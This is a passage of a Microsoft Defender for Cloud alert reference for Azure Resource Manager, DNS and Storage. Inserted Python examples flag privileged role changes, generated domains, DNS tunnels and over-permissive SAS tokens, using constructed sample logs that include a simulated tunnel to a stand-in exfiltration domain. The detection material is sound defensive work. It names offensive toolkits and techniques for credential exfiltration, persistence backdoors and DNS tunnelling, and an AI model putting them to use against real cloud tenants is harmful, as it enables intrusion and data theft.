Severity: Medium

Alert (alert type): Suspicious invocation of a high-risk 'Persistence' operation detected (Preview) (ARM_AnomalousOperation.Persistence)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to establish persistence. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to establish persistence in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Persistence
Severity: Medium


Alert (alert type): Suspicious invocation of a high-risk 'Privilege Escalation' operation detected (Preview) (ARM_AnomalousOperation.PrivilegeEscalation)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to escalate privileges. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to escalate privileges while compromising resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Privilege Escalation
Severity: Medium

Alert (alert type): Usage of MicroBurst exploitation toolkit to run an arbitrary code or exfiltrate Azure Automation account credentials (ARM_MicroBurst.RunCodeOnBehalf)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of executing arbitrary code or exfiltrating Azure Automation account credentials. Threat actors use automated scripts, like MicroBurst, to run arbitrary code for malicious activities. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: Persistence, Credential Access
Severity: High

Alert (alert type): Usage of NetSPI techniques to maintain persistence in your Azure environment (ARM_NetSPI.MaintainPersistence)
Description: Usage of NetSPI persistence technique to create a webhook backdoor and maintain persistence in your Azure environment. This was detected by analyzing Azure Resource Manager operations in your subscription.
Severity: High

Alert (alert type): Usage of PowerZure exploitation toolkit to run an arbitrary code or exfiltrate Azure Automation account credentials (ARM_PowerZure.RunCodeOnBehalf)
Description: PowerZure exploitation toolkit detected attempting to run code or exfiltrate Azure Automation account credentials. This was detected by analyzing Azure Resource Manager operations in your subscription.
Severity: High

Alert (alert type): Usage of PowerZure function to maintain persistence in your Azure environment (ARM_PowerZure.MaintainPersistence)
Description: PowerZure exploitation toolkit detected creating a webhook backdoor to maintain persistence in your Azure environment. This was detected by analyzing Azure Resource Manager operations in your subscription.
Severity: High

Alert (alert type): Suspicious classic role assignment detected (Preview) (ARM_AnomalousClassicRoleAssignment)
Description: Microsoft Defender for Resource Manager identified a suspicious classic role assignment in your tenant which might indicate that an account in your organization was compromised. The identified operations are designed to provide backward compatibility with classic roles that are no longer commonly used. While this activity may be legitimate, a threat actor might utilize such assignment to grant permissions to another user account under their control.
MITRE tactics: Lateral Movement, Defense Evasion
Severity: High
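Three of the Resource Manager patterns described above (a privileged custom role definition, a classic role assignment, and a known principal that starts managing the subscription from the portal after a long gap) as an added triage example; this is not part of the original page nor Microsoft's detection logic. The simplified event shape, the 45-day window applied to portal writes only, the "privileged" heuristic and the two Microsoft.Authorization operation names are assumptions.

```python
"""Triage helper modelled on the Resource Manager alert descriptions above.

Added example, not Microsoft's detection logic. Input is a constructed,
simplified event shape (not the real Azure Activity Log schema); the two
operation names follow Azure RBAC naming and are assumed here.
"""
from datetime import datetime, timedelta

ROLE_DEF_WRITE = "Microsoft.Authorization/roleDefinitions/write"            # custom role created/updated
CLASSIC_ADMIN_WRITE = "Microsoft.Authorization/classicAdministrators/write"  # classic role assignment
PORTAL_INACTIVITY = timedelta(days=45)  # the window named in the portal-persistence description


def is_privileged_role_definition(properties):
    """Heuristic: a custom role is 'privileged' when it grants the wildcard action
    or any Microsoft.Authorization write/wildcard, i.e. it can extend access."""
    for perm in properties.get("permissions", []):
        for action in perm.get("actions", []):
            a = action.strip().lower()
            if a == "*":
                return True
            if a.startswith("microsoft.authorization/") and (a.endswith("/write") or a.endswith("*")):
                return True
    return False


def triage(events):
    """Return (rule, caller, time) findings in event order.

    Rules mirror three alerts above: privileged custom role creation, classic
    role assignment, and a principal already seen in the subscription that
    performs a portal write after more than 45 days without one (or ever).
    """
    findings = []
    seen = set()        # principals with any earlier activity (the baseline)
    last_portal = {}    # caller -> time of their most recent portal write
    for ev in sorted(events, key=lambda e: e["time"]):
        t, caller, op = ev["time"], ev["caller"], ev["operation"]
        if op == ROLE_DEF_WRITE and is_privileged_role_definition(ev.get("properties", {})):
            findings.append(("privileged_custom_role", caller, t))
        if op == CLASSIC_ADMIN_WRITE:
            findings.append(("classic_role_assignment", caller, t))
        portal_write = ev["client"] == "portal" and op.endswith("/write")
        if portal_write and caller in seen:
            prev = last_portal.get(caller)
            if prev is None or t - prev > PORTAL_INACTIVITY:
                findings.append(("dormant_portal_session", caller, t))
        if portal_write:
            last_portal[caller] = t
        seen.add(caller)
    return findings


# Constructed sample: three principals over about eleven weeks.
SAMPLE_EVENTS = [
    {"time": datetime(2023, 4, 1), "caller": "alice@contoso.example", "client": "portal",
     "operation": "Microsoft.Compute/virtualMachines/write"},
    {"time": datetime(2023, 4, 5), "caller": "bob@contoso.example", "client": "cli",
     "operation": "Microsoft.Storage/storageAccounts/write"},
    {"time": datetime(2023, 4, 20), "caller": "alice@contoso.example", "client": "portal",
     "operation": "Microsoft.Compute/virtualMachines/write"},
    {"time": datetime(2023, 4, 22), "caller": "carol@contoso.example", "client": "portal",
     "operation": CLASSIC_ADMIN_WRITE},
    # bob has only used the CLI so far and now creates a wildcard role from the portal
    {"time": datetime(2023, 6, 15), "caller": "bob@contoso.example", "client": "portal",
     "operation": ROLE_DEF_WRITE,
     "properties": {"roleName": "helper", "permissions": [{"actions": ["*"]}]}},
    # alice's last portal write was 57 days earlier; the role itself is harmless
    {"time": datetime(2023, 6, 16), "caller": "alice@contoso.example", "client": "portal",
     "operation": ROLE_DEF_WRITE,
     "properties": {"roleName": "vm-reader",
                    "permissions": [{"actions": ["Microsoft.Compute/virtualMachines/read"]}]}},
]

if __name__ == "__main__":
    for rule, caller, when in triage(SAMPLE_EVENTS):
        print(f"{when:%Y-%m-%d} {rule:<24} {caller}")
```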


Alerts for DNS

Further details and notes

Alert (alert type): Anomalous network protocol usage (AzureDNS_ProtocolAnomaly)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected anomalous protocol usage. Such traffic, while possibly benign, may indicate abuse of this common protocol to bypass network traffic filtering. Typical related attacker activity includes copying remote administration tools to a compromised host and exfiltrating user data from it.
MITRE tactics: Exfiltration

Alert (alert type): Anonymity network activity (AzureDNS_DarkWeb)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected anonymity network activity. Such activity, while possibly legitimate user behavior, is frequently employed by attackers to evade tracking and fingerprinting of network communications. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration

Alert (alert type): Anonymity network activity using web proxy (AzureDNS_DarkWebProxy)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected anonymity network activity. Such activity, while possibly legitimate user behavior, is frequently employed by attackers to evade tracking and fingerprinting of network communications. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration

Alert (alert type): Attempted communication with suspicious sinkholed domain (AzureDNS_SinkholedDomain)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected a request for a sinkholed domain. Such activity, while possibly legitimate user behavior, is frequently an indication of the download or execution of malicious software. Typical related attacker activity is likely to include the download and execution of further malicious software or remote administration tools.
MITRE tactics: Exfiltration

Alert (alert type): Communication with possible phishing domain (AzureDNS_PhishingDomain)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected a request for a possible phishing domain. Such activity, while possibly benign, is frequently performed by attackers to harvest credentials to remote services. Typical related attacker activity is likely to include the exploitation of any credentials on the legitimate service.
MITRE tactics: Exfiltration

Alert (alert type): Communication with suspicious algorithmically generated domain (AzureDNS_DomainGenerationAlgorithm)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected possible usage of a domain generation algorithm. Such activity, while possibly benign, is frequently performed by attackers to evade network monitoring and filtering. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration

Alert (alert type): Communication with suspicious domain identified by threat intelligence (AzureDNS_ThreatIntelSuspectDomain)
Description: Communication with a suspicious domain was detected by analyzing DNS transactions from your resource and comparing against known malicious domains identified by threat intelligence feeds. Communication to malicious domains is frequently performed by attackers and could imply that your resource is compromised.
MITRE tactics: Initial Access

Alert (alert type): Communication with suspicious random domain name (AzureDNS_RandomizedDomain)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected usage of a suspicious randomly generated domain name. Such activity, while possibly benign, is frequently performed by attackers to evade network monitoring and filtering. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration

Severity
Medium


Alert (alert type): Digital currency mining activity (AzureDNS_CurrencyMining)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected digital currency mining activity. Such activity, while possibly legitimate user behavior, is frequently performed by attackers following compromise of resources. Typical related attacker activity is likely to include the download and execution of common mining tools.
MITRE tactics: Exfiltration
Severity: -

Alert (alert type): Network intrusion detection signature activation (AzureDNS_SuspiciousDomain)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected a known malicious network signature. Such activity, while possibly legitimate user behavior, is frequently an indication of the download or execution of malicious software. Typical related attacker activity is likely to include the download and execution of further malicious software or remote administration tools.
MITRE tactics: Exfiltration
Severity: -

Alert (alert type): Possible data download via DNS tunnel (AzureDNS_DataInfiltration)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected a possible DNS tunnel. Such activity, while possibly legitimate user behavior, is frequently performed by attackers to evade network monitoring and filtering. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration
Severity: -

Alert (alert type): Possible data exfiltration via DNS tunnel (AzureDNS_DataExfiltration)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected a possible DNS tunnel. Such activity, while possibly legitimate user behavior, is frequently performed by attackers to evade network monitoring and filtering. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration
Severity: -

Alert (alert type): Possible data transfer via DNS tunnel (AzureDNS_DataObfuscation)
Description: Analysis of DNS transactions from %{CompromisedEntity} detected a possible DNS tunnel. Such activity, while possibly legitimate user behavior, is frequently performed by attackers to evade network monitoring and filtering. Typical related attacker activity is likely to include the download and execution of malicious software or remote administration tools.
MITRE tactics: Exfiltration
Severity: -
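Two of the DNS alert families above, algorithmically generated or randomized domain names and possible DNS tunnels, as an added detection example run over constructed DNS log lines; this is not part of the original page nor Defender for DNS's logic. The log line format, the sample queries, the entropy and vowel-ratio thresholds and the tunnel thresholds are assumptions, and the code handles any registrable domain rather than one fixed name.

```python
"""DNS-transaction heuristics for the 'algorithmically generated domain',
'random domain name' and 'DNS tunnel' alert families described above.

Added example, not the Defender for DNS detection logic. Log lines are
constructed: "<timestamp> <source IP> <query type> <query name>".
"""
import math
from collections import defaultdict

VOWELS = set("aeiou")


def shannon_entropy(text):
    """Bits per character, estimated from the string's own symbol frequencies."""
    if not text:
        return 0.0
    n = len(text)
    freqs = {}
    for ch in text:
        freqs[ch] = freqs.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in freqs.values())


def looks_generated(label):
    """Second-level label heuristic: long, and either digit-laden with high
    entropy, or almost vowel-free. Dictionary words such as 'windowsupdate'
    stay below both thresholds; the thresholds are assumptions."""
    if len(label) < 10:
        return False
    has_digit = any(ch.isdigit() for ch in label)
    letters = [ch for ch in label if ch.isalpha()]
    vowel_ratio = sum(ch in VOWELS for ch in letters) / len(letters) if letters else 0.0
    return (has_digit and shannon_entropy(label) >= 3.0) or vowel_ratio < 0.15


def analyze(log_lines, tunnel_min_queries=5, tunnel_min_label_len=20):
    """Return {'generated_domain': [(src, domain)...], 'possible_dns_tunnel': [...]}.

    Tunnel rule: one source sends many queries to one registrable domain whose
    leftmost labels are long and almost all distinct (data encoded per query).
    """
    generated = set()
    per_pair = defaultdict(list)  # (src, registrable domain) -> leftmost labels seen
    for line in log_lines:
        _ts, src, _qtype, qname = line.split()
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 2:
            continue
        # Naive registrable domain = last two labels; a public-suffix list would be
        # needed for names such as example.co.uk.
        registrable = ".".join(labels[-2:])
        if looks_generated(labels[-2]):
            generated.add((src, registrable))
        per_pair[(src, registrable)].append(labels[0])
    tunnels = set()
    for key, labels in per_pair.items():
        mostly_distinct = len(set(labels)) >= 0.8 * len(labels)
        avg_len = sum(map(len, labels)) / len(labels)
        if len(labels) >= tunnel_min_queries and mostly_distinct and avg_len >= tunnel_min_label_len:
            tunnels.add(key)
    return {"generated_domain": sorted(generated), "possible_dns_tunnel": sorted(tunnels)}


# Constructed sample: ordinary lookups, two DGA-like names, and six queries that
# each carry a distinct 32-character hex chunk under one domain (tunnel pattern).
SAMPLE_DNS_LOG = [
    "2023-07-01T10:00:01Z 10.0.0.4 A www.microsoft.com",
    "2023-07-01T10:00:02Z 10.0.0.4 A login.microsoftonline.com",
    "2023-07-01T10:00:03Z 10.0.0.4 A www.microsoft.com",
    "2023-07-01T10:00:04Z 10.0.0.4 A windowsupdate.com",
    "2023-07-01T10:01:00Z 10.0.0.7 A kq7xz9mwv2lp.com",
    "2023-07-01T10:01:01Z 10.0.0.7 A xkqzpwvtrmb.net",
    "2023-07-01T10:02:00Z 10.0.0.9 TXT 3f9a1c4e7b2d8a6f0c5e9b1d4a7f2c8e.t.exfil-example.test",
    "2023-07-01T10:02:01Z 10.0.0.9 TXT a71e5c2b9d4f0a38c6e1b7d2f5a9c4e0.t.exfil-example.test",
    "2023-07-01T10:02:02Z 10.0.0.9 TXT 0b8d3f6a1c9e4b7d2a5f8c1e6b3d9a4f.t.exfil-example.test",
    "2023-07-01T10:02:03Z 10.0.0.9 TXT e2c7a4f1b9d6e3a0c8f5b2d7a1e4c9b6.t.exfil-example.test",
    "2023-07-01T10:02:04Z 10.0.0.9 TXT 5d1a8e3c6b0f9a2d7c4e1b8f3a6d0c5e.t.exfil-example.test",
    "2023-07-01T10:02:05Z 10.0.0.9 TXT 9c4b7e0a3d6f1c8b5a2e9d4f7b0c3a6e.t.exfil-example.test",
]

if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_DNS_LOG).items():
        for src, domain in hits:
            print(f"{kind:<20} {src:<10} {domain}")
```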


Alerts for Azure Storage

Further details and notes

Alert (alert type): Access from a suspicious application (Storage.Blob_SuspiciousApp)
Description: Indicates that a suspicious application has successfully accessed a container of a storage account with authentication. This might indicate that an attacker has obtained the credentials necessary to access the account, and is exploiting it. This could also be an indication of a penetration test carried out in your organization. Applies to: Azure Blob Storage, Azure Data Lake Storage Gen2
MITRE tactics: Initial Access
Severity: High/Medium

Alert (alert type): Access from a suspicious IP address (Storage.Blob_SuspiciousIp, Storage.Files_SuspiciousIp)
Description: Indicates that this storage account has been successfully accessed from an IP address that is considered suspicious. This alert is powered by Microsoft Threat Intelligence. Learn more about Microsoft's threat intelligence capabilities. Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2
MITRE tactics: Pre Attack
Severity: High/Medium/Low

Alert (alert type): Phishing content hosted on a storage account (Storage.Blob_PhishingContent, Storage.Files_PhishingContent)
Description: A URL used in a phishing attack points to your Azure Storage account. This URL was part of a phishing attack affecting users of Microsoft 365. Typically, content hosted on such pages is designed to trick visitors into entering their corporate credentials or financial information into a web form that looks legitimate. This alert is powered by Microsoft Threat Intelligence. Learn more about Microsoft's threat intelligence capabilities. Applies to: Azure Blob Storage, Azure Files
MITRE tactics: Collection
Severity: High


Alert (alert type): Storage account identified as source for distribution of malware (Storage.Files_WidespreadeAm)
Description: Antimalware alerts indicate that one or more infected files are stored in an Azure file share that is mounted to multiple VMs. If attackers gain access to a VM with a mounted Azure file share, they can use it to spread malware to other VMs that mount the same share. Applies to: Azure Files
MITRE tactics: Execution
Severity: Medium

Alert (alert type): The access level of a potentially sensitive storage blob container was changed to allow unauthenticated public access (Storage.Blob_OpenACL)
Description: The alert indicates that someone has changed the access level of a blob container in the storage account, which may contain sensitive data, to the 'Container' level, to allow unauthenticated (anonymous) public access. The change was made through the Azure portal. Based on statistical analysis, the blob container is flagged as possibly containing sensitive data. This analysis suggests that blob containers or storage accounts with similar names are typically not exposed to public access. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2, or premium block blobs) storage accounts.
MITRE tactics: Collection
Severity: Medium

Alert (alert type): Authenticated access from a Tor exit node (Storage.Blob_TorAnomaly, Storage.Files_TorAnomaly)
Description: One or more storage container(s) / file share(s) in your storage account were successfully accessed from an IP address known to be an active exit node of Tor (an anonymizing proxy). Threat actors use Tor to make it difficult to trace the activity back to them. Authenticated access from a Tor exit node is a likely indication that a threat actor is trying to hide their identity. Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2
MITRE tactics: Initial Access / Pre Attack
Severity: High/Medium

Alert (alert type): Access from an unusual location to a storage account (Storage.Blob_GeoAnomaly, Storage.Files_GeoAnomaly)
Description: Indicates that there was a change in the access pattern to an Azure Storage account. Someone has accessed this account from an IP address considered unfamiliar when compared with recent activity. Either an attacker has gained access to the account, or a legitimate user has connected from a new or unusual geographic location. An example of the latter is remote maintenance from a new application or developer. Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2
MITRE tactics: Initial Access
Severity: High/Medium/Low

Alert (alert type): Unusual unauthenticated access to a storage container (Storage.Blob_AnonymousAccessAnomaly)
Description: This storage account was accessed without authentication, which is a change in the common access pattern. Read access to this container is usually authenticated. This might indicate that a threat actor was able to exploit public read access to storage container(s) in this storage account(s). Applies to: Azure Blob Storage
MITRE tactics: Initial Access
Severity: High/Low


Alert (alert type): Potential malware uploaded to a storage account (Storage.Blob_MalwareHashReputation, Storage.Files_MalwareHashReputation)
Description: Indicates that a blob containing potential malware has been uploaded to a blob container or a file share in a storage account. This alert is based on hash reputation analysis leveraging the power of Microsoft threat intelligence, which includes hashes for viruses, trojans, spyware and ransomware. Potential causes may include an intentional malware upload by an attacker, or an unintentional upload of a potentially malicious blob by a legitimate user. Applies to: Azure Blob Storage, Azure Files (only for transactions over REST API). Learn more about Microsoft's threat intelligence capabilities.
MITRE tactics: Lateral Movement
Severity: High

Alert (alert type): Publicly accessible storage containers successfully discovered (Storage.Blob_OpenContainersScanning.SuccessfulDiscovery)
Description: A successful discovery of publicly open storage container(s) in your storage account was performed in the last hour by a scanning script or tool. This usually indicates a reconnaissance attack, where the threat actor tries to list blobs by guessing container names, in the hope of finding misconfigured open storage containers with sensitive data in them. The threat actor may use their own script or use known scanning tools like MicroBurst to scan for publicly open containers. Applies to: ✓ Azure Blob Storage; ✗ Azure Files; ✗ Azure Data Lake Storage Gen2
MITRE tactics: Collection
Severity: High/Medium

Alert (alert type): Publicly accessible storage containers unsuccessfully scanned (Storage.Blob_OpenContainersScanning.FailedAttempt)
Description: A series of failed attempts to scan for publicly open storage containers were performed in the last hour. This usually indicates a reconnaissance attack, where the threat actor tries to list blobs by guessing container names, in the hope of finding misconfigured open storage containers with sensitive data in them. The threat actor may use their own script or use known scanning tools like MicroBurst to scan for publicly open containers. Applies to: ✓ Azure Blob Storage; ✗ Azure Files; ✗ Azure Data Lake Storage Gen2
MITRE tactics: Collection
Severity: High/Low

Alert (alert type): Unusual access inspection in a storage account (Storage.Blob_AccessInspectionAnomaly, Storage.Files_AccessInspectionAnomaly)
Description: Indicates that the access permissions of a storage account have been inspected in an unusual way, compared to recent activity on this account. A potential cause is that an attacker has performed reconnaissance for a future attack. Applies to: Azure Blob Storage, Azure Files
MITRE tactics: Discovery
Severity: High/Medium

Alert (alert type): Unusual amount of data extracted from a storage account (Storage.Blob_DataExfiltration.AmountOfDataAnomaly, Storage.Blob_DataExfiltration.NumberOfBlobsAnomaly, Storage.Files_DataExfiltration.AmountOfDataAnomaly, Storage.Files_DataExfiltration.NumberOfFilesAnomaly)
Description: Indicates that an unusually large amount of data has been extracted compared to recent activity on this storage container. A potential cause is that an attacker has extracted a large amount of data from a container that holds blob storage. Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2
MITRE tactics: Exfiltration
Severity: High/Low

Alert (alert type): Unusual application accessed a storage account (Storage.Blob_ApplicationAnomaly, Storage.Files_ApplicationAnomaly)
Description: Indicates that an unusual application has accessed this storage account. A potential cause is that an attacker has accessed your storage account by using a new application. Applies to: Azure Blob Storage, Azure Files
MITRE tactics: Execution
Severity: High/Medium


Alert (alert type): Unusual data exploration in a storage account (Storage.Blob_DataExplorationAnomaly, Storage.Files_DataExplorationAnomaly)
Description: Indicates that blobs or containers in a storage account have been enumerated in an abnormal way, compared to recent activity on this account. A potential cause is that an attacker has performed reconnaissance for a future attack. Applies to: Azure Blob Storage, Azure Files
MITRE tactics: Execution
Severity: High/Medium

Alert (alert type): Unusual deletion in a storage account (Storage.Blob_DeletionAnomaly, Storage.Files_DeletionAnomaly)
Description: Indicates that one or more unexpected delete operations have occurred in a storage account, compared to recent activity on this account. A potential cause is that an attacker has deleted data from your storage account. Applies to: Azure Blob Storage, Azure Files, Azure Data Lake Storage Gen2
MITRE tactics: Exfiltration
Severity: High/Medium


Alert (alert type): Unusual unauthenticated public access to a sensitive blob container (Preview) (Storage.Blob_AnonymousAccessAnomaly.Sensitive)
Description: The alert indicates that someone accessed a blob container with sensitive data in the storage account without authentication, using an external (public) IP address. This access is suspicious since the blob container is open to public access and is typically only accessed with authentication from internal networks (private IP addresses). This access could indicate that the blob container's access level is misconfigured, and a malicious actor may have exploited the public access. The security alert includes the discovered sensitive information context (scanning time, classification label, information types, and file types). Learn more on sensitive data threat detection. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Initial Access
Severity: High

Alert (alert type): Unusual amount of data extracted from a sensitive blob container (Preview) (Storage.Blob_DataExfiltration.AmountOfDataAnomaly.Sensitive)
Description: The alert indicates that someone has extracted an unusually large number of blobs from a blob container with sensitive data in the storage account. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Exfiltration
Severity: Medium

Alert (alert type): Unusual number of blobs extracted from a sensitive blob container (Preview) (Storage.Blob_DataExfiltration.NumberOfBlobsAnomaly.Sensitive)
Description: The alert indicates that someone has extracted an unusually large amount of data from a blob container with sensitive data in the storage account. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Exfiltration

Alert (alert type): Access from a known suspicious application to a sensitive blob container (Preview) (Storage.Blob_SuspiciousApp.Sensitive)
Description: The alert indicates that someone with a known suspicious application accessed a blob container with sensitive data in the storage account and performed authenticated operations. The access may indicate that a threat actor obtained credentials to access the storage account by using a known suspicious application. However, the access could also indicate a penetration test carried out in the organization. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Initial Access
Severity: High

Alert (alert type): Access from a known suspicious IP address to a sensitive blob container (Preview) (Storage.Blob_SuspiciousIp.Sensitive)
Description: The alert indicates that someone accessed a blob container with sensitive data in the storage account from a known suspicious IP address associated with threat intel by Microsoft Threat Intelligence. Since the access was authenticated, it's possible that the credentials allowing access to this storage account were compromised. Learn more about Microsoft's threat intelligence capabilities. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Pre-Attack
Severity: High

Alert (alert type): Access from a Tor exit node to a sensitive blob container (Preview) (Storage.Blob_TorAnomaly.Sensitive)
Description: The alert indicates that someone with an IP address known to be a Tor exit node accessed a blob container with sensitive data in the storage account with authenticated access. Authenticated access from a Tor exit node strongly indicates that the actor is attempting to remain anonymous for possible malicious intent. Since the access was authenticated, it's possible that the credentials allowing access to this storage account were compromised. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Pre-Attack
Severity: High

Alert (alert type): Access from an unusual location to a sensitive blob container (Preview) (Storage.Blob_GeoAnomaly.Sensitive)
Description: The alert indicates that someone has accessed a blob container with sensitive data in the storage account with authentication from an unusual location. Since the access was authenticated, it's possible that the credentials allowing access to this storage account were compromised. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Initial Access
Severity: Medium

Alert (alert type): The access level of a sensitive storage blob container was changed to allow unauthenticated public access (Preview) (Storage.Blob_OpenACL.Sensitive)
Description: The alert indicates that someone has changed the access level of a blob container in the storage account, which contains sensitive data, to the 'Container' level, which allows unauthenticated (anonymous) public access. The change was made through the Azure portal. The access level change may compromise the security of the data. We recommend taking immediate action to secure the data and prevent unauthorized access in case this alert is triggered. Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the data sensitivity threat detection feature enabled.
MITRE tactics: Collection
Severity: High


Alert (alert type): Suspicious external access to an Azure storage account with overly permissive SAS token (Preview) (Storage.Blob_AccountSas.InternalSasUsedExternally)
Description: The alert indicates that someone with an external (public) IP address accessed the storage account using an overly permissive SAS token with a long expiration date. This type of access is considered suspicious because the SAS token is typically only used in internal networks (from private IP addresses).

The activity may indicate that a SAS token has been leaked by a malicious actor or leaked unintentionally from a legitimate source.

Even if the access is legitimate, using a high-permission SAS token with a long expiration date goes against security best practices and poses a potential security risk.

Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan.
MITRE tactics: Exfiltration / Resource Development / Impact
Severity: Medium

Alert (alert type): Suspicious external operation to an Azure storage account with overly permissive SAS token (Preview) (Storage.Blob_AccountSas.UnusualOperationFromExternalIp)
Description: The alert indicates that someone with an external (public) IP address accessed the storage account using an overly permissive SAS token with a long expiration date. The access is considered suspicious because operations invoked outside your network (not from private IP addresses) with this SAS token are typically used for a specific set of Read/Write/Delete operations, but other operations occurred, which makes this access suspicious.

This activity may indicate that a SAS token has been leaked by a malicious actor or leaked unintentionally from a legitimate source.

Even if the access is legitimate, using a high-permission SAS token with a long expiration date goes against security best practices and poses a potential security risk.

Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan.
MITRE tactics: Exfiltration / Resource Development / Impact
Severity: Medium
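As an added example (not part of the Defender for Cloud reference), the following Python triages an account SAS token along the lines these two alerts describe: it parses the token's query parameters and flags write-like permissions, a long expiration date, a missing source-IP restriction and use from a public address. The sample token strings, the seven-day lifetime threshold and the fixed review time are constructed assumptions.

```python
"""Added example (not from the Defender for Cloud docs): review a storage SAS token
for the properties the SAS-token alerts above describe."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# 'sp' letters in a SAS: r read, l list, and the write-like set below
# (w write, d delete, a add, c create, u update, x delete version, y permanent delete).
WRITE_LIKE = set("wdacuxy")
# Assumption for this example: a token still valid a week from now is "long-lived".
MAX_LIFETIME = timedelta(days=7)
# Fixed review time so the results are reproducible offline.
REVIEW_TIME = datetime(2023, 7, 24, tzinfo=timezone.utc)
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]

# Constructed sample tokens; the signatures are placeholders, not real HMACs.
LEAKED_SAS = ("?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacupiytfx"
              "&st=2023-06-01T00:00:00Z&se=2030-01-01T00:00:00Z&spr=https&sig=PLACEHOLDER")
SCOPED_SAS = ("?sv=2022-11-02&sr=b&sp=r&se=2023-07-25T00:00:00Z"
              "&sip=10.0.0.0-10.0.0.255&spr=https&sig=PLACEHOLDER")


@dataclass
class SasReview:
    is_account_sas: bool
    permissions: str
    expiry: datetime | None
    findings: list[str] = field(default_factory=list)


def is_private_ip(addr: str) -> bool:
    """True for RFC 1918 / loopback / link-local style addresses (IPv4 or IPv6)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_NETS)


def parse_sas_time(value: str) -> datetime:
    """'st'/'se' are ISO 8601 UTC; seconds are optional and a bare date is allowed."""
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%MZ", "%Y-%m-%dZ"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError(f"unrecognised SAS timestamp: {value!r}")


def review_sas(url_or_query: str, caller_ip: str, now: datetime = REVIEW_TIME) -> SasReview:
    """Return the risk findings for a SAS token that was used from caller_ip at time now."""
    query = urlsplit(url_or_query).query if "?" in url_or_query else url_or_query
    params = {k: v[0] for k, v in parse_qs(query).items()}
    perms = params.get("sp", "")
    # An account SAS carries 'ss' (services) and 'srt' (resource types); a service SAS does not.
    is_account = "ss" in params and "srt" in params
    expiry = parse_sas_time(params["se"]) if "se" in params else None
    review = SasReview(is_account, perms, expiry)

    if is_account:
        review.findings.append("account SAS: scope is the whole storage account, not one container or blob")
    granted = WRITE_LIKE & set(perms)
    if granted:
        review.findings.append("write-like permissions granted: " + "".join(sorted(granted)))
    if "l" in perms:
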